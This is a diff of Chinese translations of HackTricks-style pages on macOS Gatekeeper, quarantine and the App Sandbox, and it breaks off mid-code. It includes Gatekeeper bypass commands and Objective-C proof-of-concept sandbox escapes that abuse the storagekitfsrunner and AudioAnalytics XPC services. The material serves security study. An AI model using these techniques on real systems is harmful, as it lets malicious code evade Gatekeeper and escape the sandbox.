-在用户首次安装或执行软件时,notarization ticket 的存在 - 无论是附加在可执行文件上还是在线找到 - **通知 Gatekeeper 该软件已由苹果进行 notarization**。因此,Gatekeeper 在初始启动对话框中显示描述性消息,指示该软件已通过苹果的恶意内容检查。这个过程增强了用户对他们在系统上安装或运行的软件安全性的信心。 +在用户首次安装或执行软件时,notarization 票据的存在 - 无论是附加在可执行文件上还是在线找到 - **通知 Gatekeeper 该软件已由苹果进行 notarization**。因此,Gatekeeper 在初始启动对话框中显示描述性消息,指示该软件已通过苹果的恶意内容检查。这个过程增强了用户对他们在系统上安装或运行的软件安全性的信心。 ### spctl & syspolicyd > [!CAUTION] > 请注意,从 Sequoia 版本开始,**`spctl`** 不再允许修改 Gatekeeper 配置。 -**`spctl`** 是用于枚举和与 Gatekeeper 交互的 CLI 工具(通过 XPC 消息与 `syspolicyd` 守护进程交互)。例如,可以使用以下命令查看 GateKeeper 的 **状态**: +**`spctl`** 是用于枚举和与 Gatekeeper 交互的 CLI 工具(通过 XPC 消息与 `syspolicyd` 守护进程进行交互)。例如,可以使用以下命令查看 GateKeeper 的 **状态**: ```bash # Check the status spctl --status @@ -149,20 +145,20 @@ spctl --assess -v /Applications/App.app ### 隔离文件 -在 **下载** 应用程序或文件时,特定的 macOS **应用程序**(如网页浏览器或电子邮件客户端)会为下载的文件 **附加一个扩展文件属性**,通常称为 "**隔离标志**"。该属性作为安全措施,**标记文件** 来自不受信任的来源(互联网),并可能带来风险。然而,并非所有应用程序都会附加此属性,例如,常见的 BitTorrent 客户端软件通常会绕过此过程。 +在 **下载** 应用程序或文件时,特定的 macOS **应用程序**(如网页浏览器或电子邮件客户端)会为下载的文件 **附加一个扩展文件属性**,通常称为 "**隔离标志**"。此属性作为安全措施,**标记文件** 来自不受信任的来源(互联网),并可能带来风险。然而,并非所有应用程序都会附加此属性,例如,常见的 BitTorrent 客户端软件通常会绕过此过程。 **隔离标志的存在在用户尝试执行文件时会触发 macOS 的 Gatekeeper 安全功能**。 如果 **隔离标志不存在**(例如通过某些 BitTorrent 客户端下载的文件),则可能不会执行 Gatekeeper 的 **检查**。因此,用户在打开来自不太安全或未知来源的文件时应谨慎。 -> [!NOTE] > **检查** 代码签名的 **有效性** 是一个 **资源密集型** 过程,包括生成代码及其所有捆绑资源的加密 **哈希**。此外,检查证书有效性还涉及对 Apple 服务器进行 **在线检查**,以查看其在发放后是否被撤销。因此,完整的代码签名和公证检查在每次启动应用时都是 **不切实际的**。 +> [!NOTE] > **检查** 代码签名的 **有效性** 是一个 **资源密集型** 过程,包括生成代码及其所有捆绑资源的加密 **哈希**。此外,检查证书有效性还涉及对 Apple 服务器进行 **在线检查**,以查看其在发放后是否被撤销。因此,完整的代码签名和公证检查在每次启动应用程序时都是 **不切实际的**。 > -> 因此,这些检查 **仅在执行带有隔离属性的应用时运行**。 +> 因此,这些检查 **仅在执行带有隔离属性的应用程序时运行**。 > [!WARNING] > 此属性必须由 **创建/下载** 文件的应用程序 **设置**。 > -> 然而,被沙盒化的文件将对它们创建的每个文件设置此属性。而非沙盒应用可以自行设置,或在 **Info.plist** 中指定 [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc) 键,这将使系统在创建的文件上设置 `com.apple.quarantine` 扩展属性。 +> 然而,被沙盒化的文件将对它们创建的每个文件设置此属性。而非沙盒应用程序可以自行设置,或在 **Info.plist** 中指定 [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc) 键,这将使系统在创建的文件上设置 `com.apple.quarantine` 扩展属性。 此外,所有调用 **`qtn_proc_apply_to_self`** 的进程创建的文件都将被隔离。或者 API **`qtn_file_apply_to_path`** 会将隔离属性添加到指定的文件路径。 @@ -285,7 +281,7 @@ find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; pri 内核扩展仅通过 **系统上的内核缓存** 可用;然而,您 _可以_ 从 [**https://developer.apple.com/**](https://developer.apple.com/) 下载 **内核调试工具包**,其中将包含该扩展的符号化版本。 -此 Kext 将通过 MACF 钩住多个调用,以捕获所有文件生命周期事件:创建、打开、重命名、硬链接... 甚至 `setxattr` 以防止其设置 `com.apple.quarantine` 扩展属性。 +该 Kext 将通过 MACF 钩住多个调用,以捕获所有文件生命周期事件:创建、打开、重命名、硬链接... 甚至 `setxattr` 以防止其设置 `com.apple.quarantine` 扩展属性。 它还使用了一些 MIB: @@ -298,13 +294,13 @@ XProtect 是 macOS 中内置的 **反恶意软件** 功能。XProtect **在应 XProtect 数据库由 Apple **定期更新** 新的恶意软件定义,这些更新会自动下载并安装到您的 Mac 上。这确保了 XProtect 始终与最新已知威胁保持同步。 -然而,值得注意的是 **XProtect 不是一个功能齐全的防病毒解决方案**。它仅检查特定已知威胁列表,并不像大多数防病毒软件那样执行按需扫描。 +然而,值得注意的是 **XProtect 不是一个功能齐全的防病毒解决方案**。它仅检查特定已知威胁列表,并且不像大多数防病毒软件那样执行按需扫描。 您可以通过运行获取有关最新 XProtect 更新的信息: ```bash system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 ``` -XProtect 位于 SIP 保护位置 **/Library/Apple/System/Library/CoreServices/XProtect.bundle**,在该 bundle 内可以找到 XProtect 使用的信息: +XProtect 位于 SIP 保护位置 **/Library/Apple/System/Library/CoreServices/XProtect.bundle**,在该捆绑包中可以找到 XProtect 使用的信息: - **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**:允许具有这些 cdhash 的代码使用遗留权限。 - **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**:不允许通过 BundleID 和 TeamID 加载的插件和扩展的列表,或指示最低版本。 @@ -316,11 +312,11 @@ XProtect 位于 SIP 保护位置 **/Library/Apple/System/Library/CoreServices/XP ### 不是 Gatekeeper > [!CAUTION] -> 请注意,Gatekeeper **并不是每次** 执行应用程序时都会被执行,只有 _**AppleMobileFileIntegrity**_ (AMFI) 会在执行已经由 Gatekeeper 执行和验证的应用程序时 **验证可执行代码签名**。 +> 请注意,Gatekeeper **并不是每次** 执行应用程序时都会执行,只有 _**AppleMobileFileIntegrity**_ (AMFI) 会在执行已经由 Gatekeeper 执行和验证的应用程序时 **验证可执行代码签名**。 -因此,之前可以执行一个应用程序以便用 Gatekeeper 缓存它,然后 **修改应用程序的非可执行文件**(如 Electron asar 或 NIB 文件),如果没有其他保护措施,应用程序将 **执行** 带有 **恶意** 附加内容的版本。 +因此,之前可以执行一个应用程序以缓存 Gatekeeper,然后 **修改应用程序的非可执行文件**(如 Electron asar 或 NIB 文件),如果没有其他保护措施,应用程序将 **执行** 带有 **恶意** 附加内容的版本。 -然而,现在这已不再可能,因为 macOS **防止修改** 应用程序包内的文件。因此,如果您尝试 [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md) 攻击,您会发现不再可能利用它,因为在执行应用程序以用 Gatekeeper 缓存它后,您将无法修改该 bundle。如果您例如将 Contents 目录的名称更改为 NotCon(如漏洞中所示),然后执行应用程序的主二进制文件以用 Gatekeeper 缓存它,将会触发错误并且不会执行。 +然而,现在这已不再可能,因为 macOS **防止修改** 应用程序捆绑包中的文件。因此,如果您尝试 [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md) 攻击,您会发现不再可能利用它,因为在执行应用程序以缓存 Gatekeeper 后,您将无法修改捆绑包。如果您例如将 Contents 目录的名称更改为 NotCon(如漏洞中所示),然后执行应用程序的主二进制文件以缓存 Gatekeeper,将会触发错误并且不会执行。 ## Gatekeeper 绕过 @@ -336,7 +332,7 @@ XProtect 位于 SIP 保护位置 **/Library/Apple/System/Library/CoreServices/XP 当使用 **Automator** 创建应用程序时,关于其执行所需的信息位于 `application.app/Contents/document.wflow` 中,而不在可执行文件中。可执行文件只是一个名为 **Automator Application Stub** 的通用 Automator 二进制文件。 -因此,您可以使 `application.app/Contents/MacOS/Automator\ Application\ Stub` **通过符号链接指向系统内的另一个 Automator Application Stub**,它将执行 `document.wflow` 中的内容(您的脚本) **而不会触发 Gatekeeper**,因为实际的可执行文件没有 quarantine xattr。 +因此,您可以使 `application.app/Contents/MacOS/Automator\ Application\ Stub` **通过符号链接指向系统内的另一个 Automator Application Stub**,它将执行 `document.wflow` 中的内容(您的脚本) **而不会触发 Gatekeeper**,因为实际的可执行文件没有隔离 xattr。 示例预期位置:`/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub` @@ -344,7 +340,7 @@ XProtect 位于 SIP 保护位置 **/Library/Apple/System/Library/CoreServices/XP ### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/) -在此绕过中,创建了一个 zip 文件,应用程序从 `application.app/Contents` 开始压缩,而不是从 `application.app`。因此,**quarantine attr** 被应用于所有 **来自 `application.app/Contents` 的文件**,但 **不适用于 `application.app`**,这是 Gatekeeper 检查的内容,因此 Gatekeeper 被绕过,因为当触发 `application.app` 时 **没有 quarantine 属性。** +在此绕过中,创建了一个 zip 文件,应用程序从 `application.app/Contents` 开始压缩,而不是从 `application.app`。因此,**隔离属性** 应用于所有 **来自 `application.app/Contents` 的文件**,但 **不适用于 `application.app`**,这是 Gatekeeper 检查的内容,因此 Gatekeeper 被绕过,因为当触发 `application.app` 时 **没有隔离属性。** ```bash zip -r test.app/Contents test.zip ``` @@ -367,9 +363,9 @@ chmod +a "everyone deny writeextattr" /tmp/no-attr xattr -w attrname vale /tmp/no-attr xattr: [Errno 13] Permission denied: '/tmp/no-attr' ``` -此外,**AppleDouble** 文件格式复制了一个文件及其 ACE。 +此外,**AppleDouble** 文件格式复制一个文件及其 ACE。 -在 [**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) 中可以看到,存储在名为 **`com.apple.acl.text`** 的 xattr 中的 ACL 文本表示将被设置为解压缩文件中的 ACL。因此,如果您将一个应用程序压缩成一个带有 ACL 的 **AppleDouble** 文件格式的 zip 文件,该 ACL 阻止其他 xattrs 被写入... 那么隔离 xattr 并没有被设置到应用程序中: +在 [**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) 中可以看到,存储在名为 **`com.apple.acl.text`** 的 xattr 中的 ACL 文本表示将被设置为解压缩文件中的 ACL。因此,如果您将一个应用程序压缩成一个带有 ACL 的 **AppleDouble** 文件格式的 zip 文件,该 ACL 阻止其他 xattrs 被写入... 那么隔离 xattr 并没有被设置到该应用程序中: ```bash chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test ditto -c -k test test.zip @@ -401,7 +397,7 @@ aa archive -d test/ -o test.aar # If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute ``` -能够创建一个不会设置隔离属性的文件,**可以绕过 Gatekeeper。** 这个技巧是**使用 AppleDouble 命名约定创建一个 DMG 文件应用程序**(以 `._` 开头),并创建一个**作为此隐藏文件的符号链接的可见文件**,而没有隔离属性。\ +能够创建一个不会设置隔离属性的文件,使得**可以绕过 Gatekeeper。** 这个技巧是**使用 AppleDouble 命名约定创建一个 DMG 文件应用程序**(以 `._` 开头),并创建一个**作为此隐藏文件的符号链接的可见文件**,而没有隔离属性。\ 当**dmg 文件被执行**时,由于它没有隔离属性,它将**绕过 Gatekeeper。** ```bash # Create an app bundle with the backdoor an call it app.app @@ -431,8 +427,5 @@ aa archive -d s/ -o app.aar 在 ".app" 包中,如果没有添加 quarantine xattr,当执行时 **Gatekeeper 不会被触发**。 -
- -{% embed url="https://websec.nl/" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md index a30521046..949b1e186 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md @@ -4,7 +4,7 @@ ## 基本信息 -MacOS Sandbox(最初称为 Seatbelt)**限制应用程序**在沙箱内运行时只能执行**沙箱配置文件中指定的允许操作**。这有助于确保**应用程序仅访问预期的资源**。 +MacOS Sandbox(最初称为 Seatbelt)**限制在沙箱内运行的应用程序**只能执行**沙箱配置文件中指定的允许操作**。这有助于确保**应用程序仅访问预期的资源**。 任何具有**权限** **`com.apple.security.app-sandbox`**的应用程序将会在沙箱内执行。**Apple 二进制文件**通常在沙箱内执行,所有来自**App Store**的应用程序都有该权限。因此,多个应用程序将在沙箱内执行。 @@ -54,9 +54,9 @@ drwx------ 2 username staff 64 Mar 24 18:02 SystemData drwx------ 2 username staff 64 Mar 24 18:02 tmp ``` > [!CAUTION] -> 请注意,即使符号链接存在以“逃离”沙箱并访问其他文件夹,应用程序仍然需要**拥有权限**才能访问它们。这些权限在`RedirectablePaths`中的**`.plist`**内。 +> 请注意,即使符号链接存在以“逃离”沙盒并访问其他文件夹,应用程序仍然需要**具有权限**才能访问它们。这些权限在`RedirectablePaths`中的**`.plist`**内。 -**`SandboxProfileData`**是编译后的沙箱配置文件CFData,已转义为B64。 +**`SandboxProfileData`**是编译后的沙盒配置文件CFData,已转义为B64。 ```bash # Get container config ## You need FDA to access the file, not even just root can read it @@ -133,7 +133,7 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf... > [!TIP] > 查看这个 [**研究**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **以检查更多可能被允许或拒绝的操作。** > -> 请注意,在配置文件的编译版本中,操作的名称被其在一个数组中的条目所替代,该数组为dylib和kext所知,使得编译版本更短且更难以阅读。 +> 请注意,在配置文件的编译版本中,操作的名称被其在一个数组中的条目所替代,该数组为dylib和kext所知,使得编译版本更短且更难阅读。 重要的 **系统服务** 也在其自定义 **沙箱** 内运行,例如 `mdnsresponder` 服务。您可以在以下位置查看这些自定义 **沙箱配置文件**: @@ -143,7 +143,9 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf... **App Store** 应用使用 **配置文件** **`/System/Library/Sandbox/Profiles/application.sb`**。您可以在此配置文件中检查诸如 **`com.apple.security.network.server`** 的权限如何允许进程使用网络。 -SIP 是一个名为 platform_profile 的沙箱配置文件,位于 /System/Library/Sandbox/rootless.conf +然后,一些 **Apple 守护进程服务** 使用位于 `/System/Library/Sandbox/Profiles/*.sb` 或 `/usr/share/sandbox/*.sb` 的不同配置文件。这些沙箱在调用 API `sandbox_init_XXX` 的主函数中应用。 + +**SIP** 是一个名为 platform_profile 的沙箱配置文件,位于 `/System/Library/Sandbox/rootless.conf`。 ### 沙箱配置文件示例 @@ -203,13 +205,13 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last 绕过示例: - [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html) -- [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (他们能够写入以 `~$` 开头的沙箱外文件)。 +- [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (他们能够写入以 `~$` 开头的沙箱外部文件)。 ### 沙箱跟踪 #### 通过配置文件 -可以跟踪沙箱每次检查操作时执行的所有检查。为此,只需创建以下配置文件: +可以跟踪每次检查操作时沙箱执行的所有检查。为此,只需创建以下配置文件: ```scheme:trace.sb (version 1) (trace /tmp/trace.out) @@ -225,7 +227,7 @@ sandbox-exec -f /tmp/trace.sb /bin/ls #### 通过 API `libsystem_sandbox.dylib` 导出的函数 `sandbox_set_trace_path` 允许指定一个跟踪文件名,沙箱检查将写入该文件。\ -还可以通过调用 `sandbox_vtrace_enable()` 做类似的事情,然后通过调用 `sandbox_vtrace_report()` 从缓冲区获取日志错误。 +还可以通过调用 `sandbox_vtrace_enable()` 来执行类似的操作,然后通过调用 `sandbox_vtrace_report()` 从缓冲区获取日志错误。 ### 沙箱检查 @@ -251,7 +253,7 @@ MacOS 将系统沙箱配置文件存储在两个位置:**/usr/share/sandbox/** (let* ((port (open-input-string string)) (sbpl (read port))) (with-transparent-redirection (eval sbpl))))) ``` -这将**在此权限后评估字符串**作为沙箱配置文件。 +这将**在此权限之后评估字符串**作为沙箱配置文件。 ### 编译和反编译沙箱配置文件 @@ -292,9 +294,9 @@ macos-sandbox-debug-and-bypass/ ### **检查 PID 权限** -[**根据这个**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s),**`sandbox_check`** 函数(它是一个 `__mac_syscall`)可以检查**某个 PID、审计令牌或唯一 ID 是否允许某个操作**。 +[**根据这个**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s),**`sandbox_check`** 函数(它是一个 `__mac_syscall`)可以检查**在特定 PID、审计令牌或唯一 ID 下某个操作是否被沙箱允许**。 -[**工具 sbtool**](http://newosxbook.com/src.jl?tree=listings&file=sbtool.c)(在这里[编译](https://newosxbook.com/articles/hitsb.html))可以检查某个 PID 是否可以执行某些操作: +[**工具 sbtool**](http://newosxbook.com/src.jl?tree=listings&file=sbtool.c)(在[这里编译](https://newosxbook.com/articles/hitsb.html))可以检查某个 PID 是否可以执行某些操作: ```bash sbtool mach #Check mac-ports (got from launchd with an api) sbtool file /tmp #Check file access @@ -350,7 +352,7 @@ sbtool all 请注意,在 iOS 中,内核扩展包含 **硬编码的所有配置文件**,以避免被修改。以下是内核扩展中的一些有趣函数: -- **`hook_policy_init`**: 它挂钩 `mpo_policy_init`,并在 `mac_policy_register` 之后调用。它执行沙箱的大部分初始化。它还初始化 SIP。 +- **`hook_policy_init`**: 它挂钩 `mpo_policy_init`,并在 `mac_policy_register` 之后被调用。它执行沙箱的大部分初始化。它还初始化 SIP。 - **`hook_policy_initbsd`**: 它设置 sysctl 接口,注册 `security.mac.sandbox.sentinel`、`security.mac.sandbox.audio_active` 和 `security.mac.sandbox.debug_mode`(如果以 `PE_i_can_has_debugger` 启动)。 - **`hook_policy_syscall`**: 它由 `mac_syscall` 调用,第一个参数为 "Sandbox",第二个参数为指示操作的代码。使用 switch 来根据请求的代码查找要运行的代码。 @@ -366,11 +368,11 @@ sbtool all - `mpo_vnode_check_exec`: 当进程加载相关二进制文件时调用,然后执行配置文件检查,并检查禁止 SUID/SGID 执行。 - `mpo_cred_label_update_execve`: 当分配标签时调用。这是最长的一个,因为它在二进制文件完全加载但尚未执行时调用。它将执行诸如创建沙箱对象、将沙箱结构附加到 kauth 凭据、移除对 mach 端口的访问等操作。 -请注意 **`_cred_sb_evalutate`** 是 **`sb_evaluate_internal`** 的封装,该函数获取传入的凭据,然后使用 **`eval`** 函数执行评估,该函数通常评估默认应用于所有进程的 **平台配置文件**,然后是 **特定进程配置文件**。请注意,平台配置文件是 **SIP** 在 macOS 中的主要组成部分之一。 +请注意,**`_cred_sb_evalutate`** 是 **`sb_evaluate_internal`** 的封装,该函数获取传入的凭据,然后使用 **`eval`** 函数执行评估,该函数通常评估默认应用于所有进程的 **平台配置文件**,然后是 **特定进程配置文件**。请注意,平台配置文件是 **SIP** 在 macOS 中的主要组成部分之一。 ## Sandboxd -沙箱还有一个用户守护进程,暴露了 XPC Mach 服务 `com.apple.sandboxd` 并绑定特殊端口 14 (`HOST_SEATBELT_PORT`),内核扩展使用该端口与其通信。它通过 MIG 暴露了一些函数。 +沙箱还有一个用户守护进程,暴露了 XPC Mach 服务 `com.apple.sandboxd`,并绑定特殊端口 14 (`HOST_SEATBELT_PORT`),内核扩展使用该端口与其通信。它通过 MIG 暴露了一些函数。 ## References diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md index 595b4ff29..88be19db4 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md @@ -10,38 +10,38 @@ 编译器将链接 `/usr/lib/libSystem.B.dylib` 到二进制文件。 -然后,**`libSystem.B`** 将调用其他几个函数,直到 **`xpc_pipe_routine`** 将应用程序的权限发送给 **`securityd`**。Securityd 检查该进程是否应该在沙箱内被隔离,如果是,它将被隔离。\ -最后,沙箱将通过调用 **`__sandbox_ms`** 被激活,该调用将调用 **`__mac_syscall`**。 +然后,**`libSystem.B`** 将调用其他几个函数,直到 **`xpc_pipe_routine`** 将应用程序的权限发送到 **`securityd`**。Securityd 检查该进程是否应该在沙箱内进行隔离,如果是,它将被隔离。\ +最后,沙箱将通过调用 **`__sandbox_ms`** 激活,该调用将调用 **`__mac_syscall`**。 -## 可能的绕过 +## Possible Bypasses -### 绕过隔离属性 +### Bypassing quarantine attribute -**由沙箱进程创建的文件** 会附加 **隔离属性** 以防止沙箱逃逸。然而,如果你能够 **在沙箱应用程序内创建一个没有隔离属性的 `.app` 文件夹**,你可以使应用程序包的二进制文件指向 **`/bin/bash`** 并在 **plist** 中添加一些环境变量,以利用 **`open`** 来 **启动新的未沙箱应用程序**。 +**沙箱进程创建的文件** 会附加 **隔离属性** 以防止沙箱逃逸。然而,如果你能够 **在沙箱应用程序内创建一个没有隔离属性的 `.app` 文件夹**,你可以使应用程序包的二进制文件指向 **`/bin/bash`** 并在 **plist** 中添加一些环境变量,以利用 **`open`** 来 **启动新的未沙箱应用程序**。 这就是在 [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)** 中所做的。** > [!CAUTION] > 因此,目前,如果你仅能创建一个以 **`.app`** 结尾且没有隔离属性的文件夹,你可以逃离沙箱,因为 macOS 只 **检查** **`.app` 文件夹** 和 **主可执行文件** 中的 **隔离** 属性(我们将主可执行文件指向 **`/bin/bash`**)。 > -> 请注意,如果一个 .app 包已经被授权运行(它有一个带有授权运行标志的隔离 xttr),你也可以利用它……只是现在你不能在 **`.app`** 包内写入,除非你拥有一些特权 TCC 权限(在高沙箱内你将没有这些权限)。 +> 请注意,如果一个 .app 包已经被授权运行(它具有带有授权运行标志的隔离 xttr),你也可以利用它……只是现在你不能在 **`.app`** 包内写入,除非你拥有一些特权 TCC 权限(在高沙箱内你将没有这些权限)。 -### 利用 Open 功能 +### Abusing Open functionality -在 [**Word 沙箱绕过的最后示例**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) 中可以看到如何利用 **`open`** CLI 功能来绕过沙箱。 +在 [**Word 沙箱绕过的最后示例**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) 中可以看到如何滥用 **`open`** CLI 功能来绕过沙箱。 {{#ref}} macos-office-sandbox-bypasses.md {{#endref}} -### 启动代理/守护进程 +### Launch Agents/Daemons -即使一个应用程序是 **旨在被沙箱化** (`com.apple.security.app-sandbox`),如果它是 **从 LaunchAgent 执行**(例如 `~/Library/LaunchAgents`),也有可能绕过沙箱。\ +即使一个应用程序 **旨在被沙箱化** (`com.apple.security.app-sandbox`),如果它是 **从 LaunchAgent 执行**(例如 `~/Library/LaunchAgents`),也有可能绕过沙箱。\ 正如在 [**这篇文章**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818) 中所解释的,如果你想要在一个沙箱应用程序中获得持久性,你可以使其作为 LaunchAgent 自动执行,并可能通过 DyLib 环境变量注入恶意代码。 -### 利用自动启动位置 +### Abusing Auto Start Locations -如果一个沙箱进程可以 **写入** 一个 **稍后将运行二进制文件的未沙箱应用程序** 的位置,它将能够 **仅通过将** 二进制文件放在那里来 **逃逸**。这类位置的一个好例子是 `~/Library/LaunchAgents` 或 `/System/Library/LaunchDaemons`。 +如果一个沙箱进程可以 **写入** 一个 **稍后将运行二进制文件的未沙箱应用程序** 的位置,它将能够 **通过将二进制文件放置在那里** 来逃离沙箱。这种位置的一个好例子是 `~/Library/LaunchAgents` 或 `/System/Library/LaunchDaemons`。 为此,你可能需要 **2 步**:使一个具有 **更宽松沙箱** (`file-read*`, `file-write*`) 的进程执行你的代码,该代码实际上将在一个 **未沙箱的地方执行**。 @@ -51,7 +51,7 @@ macos-office-sandbox-bypasses.md ../../../../macos-auto-start-locations.md {{#endref}} -### 利用其他进程 +### Abusing other processes 如果从沙箱进程中你能够 **妥协其他在较少限制沙箱中运行的进程**(或没有沙箱),你将能够逃离它们的沙箱: @@ -59,23 +59,184 @@ macos-office-sandbox-bypasses.md ../../../macos-proces-abuse/ {{#endref}} +### Available System and User Mach services + +沙箱还允许通过在配置文件 `application.sb` 中定义的 XPC 与某些 **Mach 服务** 进行通信。如果你能够 **滥用** 其中一个服务,你可能能够 **逃离沙箱**。 + +正如在 [这篇文章](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/) 中所指出的,关于 Mach 服务的信息存储在 `/System/Library/xpc/launchd.plist` 中。可以通过在该文件中搜索 `System` 和 `User` 来找到所有系统和用户 Mach 服务。 + +此外,可以通过调用 `bootstrap_look_up` 来检查某个 Mach 服务是否可用于沙箱应用程序: +```objectivec +void checkService(const char *serviceName) { +mach_port_t service_port = MACH_PORT_NULL; +kern_return_t err = bootstrap_look_up(bootstrap_port, serviceName, &service_port); +if (!err) { +NSLog(@"available service:%s", serviceName); +mach_port_deallocate(mach_task_self_, service_port); +} +} + +void print_available_xpc(void) { +NSDictionary* dict = [NSDictionary dictionaryWithContentsOfFile:@"/System/Library/xpc/launchd.plist"]; +NSDictionary* launchDaemons = dict[@"LaunchDaemons"]; +for (NSString* key in launchDaemons) { +NSDictionary* job = launchDaemons[key]; +NSDictionary* machServices = job[@"MachServices"]; +for (NSString* serviceName in machServices) { +checkService(serviceName.UTF8String); +} +} +} +``` +### 可用的 PID Mach 服务 + +这些 Mach 服务最初被滥用以 [在这篇文章中逃离沙箱](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)。那时,**应用程序及其框架所需的所有 XPC 服务**在应用程序的 PID 域中都是可见的(这些是 `ServiceType` 为 `Application` 的 Mach 服务)。 + +为了 **联系 PID 域 XPC 服务**,只需在应用程序中注册它,使用如下代码: +```objectivec +[[NSBundle bundleWithPath:@“/System/Library/PrivateFrameworks/ShoveService.framework"]load]; +``` +此外,可以通过在 `System/Library/xpc/launchd.plist` 中搜索 `Application` 来找到所有的 **Application** Mach 服务。 + +找到有效的 xpc 服务的另一种方法是检查以下内容: +```bash +find /System/Library/Frameworks -name "*.xpc" +find /System/Library/PrivateFrameworks -name "*.xpc" +``` +几个滥用此技术的示例可以在[**原始报告**](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)中找到,以下是一些总结的示例。 + +#### /System/Library/PrivateFrameworks/StorageKit.framework/XPCServices/storagekitfsrunner.xpc + +此服务通过始终返回`YES`来允许每个XPC连接,方法`runTask:arguments:withReply:`执行任意命令和任意参数。 + +该漏洞的利用“简单到”: +```objectivec +@protocol SKRemoteTaskRunnerProtocol +-(void)runTask:(NSURL *)task arguments:(NSArray *)args withReply:(void (^)(NSNumber *, NSError *))reply; +@end + +void exploit_storagekitfsrunner(void) { +[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/StorageKit.framework"] load]; +NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.storagekitfsrunner"]; +conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(SKRemoteTaskRunnerProtocol)]; +[conn setInterruptionHandler:^{NSLog(@"connection interrupted!");}]; +[conn setInvalidationHandler:^{NSLog(@"connection invalidated!");}]; +[conn resume]; + +[[conn remoteObjectProxy] runTask:[NSURL fileURLWithPath:@"/usr/bin/touch"] arguments:@[@"/tmp/sbx"] withReply:^(NSNumber *bSucc, NSError *error) { +NSLog(@"run task result:%@, error:%@", bSucc, error); +}]; +} +``` +#### /System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework/XPCServices/AudioAnalyticsHelperService.xpc + +这个 XPC 服务允许每个客户端始终返回 YES,方法 `createZipAtPath:hourThreshold:withReply:` 基本上允许指示要压缩的文件夹路径,并将其压缩为 ZIP 文件。 + +因此,可以生成一个虚假的应用程序文件夹结构,压缩它,然后解压并执行,以逃离沙盒,因为新文件将没有隔离属性。 + +该漏洞是: +```objectivec +@protocol AudioAnalyticsHelperServiceProtocol +-(void)pruneZips:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply; +-(void)createZipAtPath:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply; +@end +void exploit_AudioAnalyticsHelperService(void) { +NSString *currentPath = NSTemporaryDirectory(); +chdir([currentPath UTF8String]); +NSLog(@"======== preparing payload at the current path:%@", currentPath); +system("mkdir -p compressed/poc.app/Contents/MacOS; touch 1.json"); +[@"#!/bin/bash\ntouch /tmp/sbx\n" writeToFile:@"compressed/poc.app/Contents/MacOS/poc" atomically:YES encoding:NSUTF8StringEncoding error:0]; +system("chmod +x compressed/poc.app/Contents/MacOS/poc"); + +[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework"] load]; +NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.internal.audioanalytics.helper"]; +conn.remoteObjectInterface = 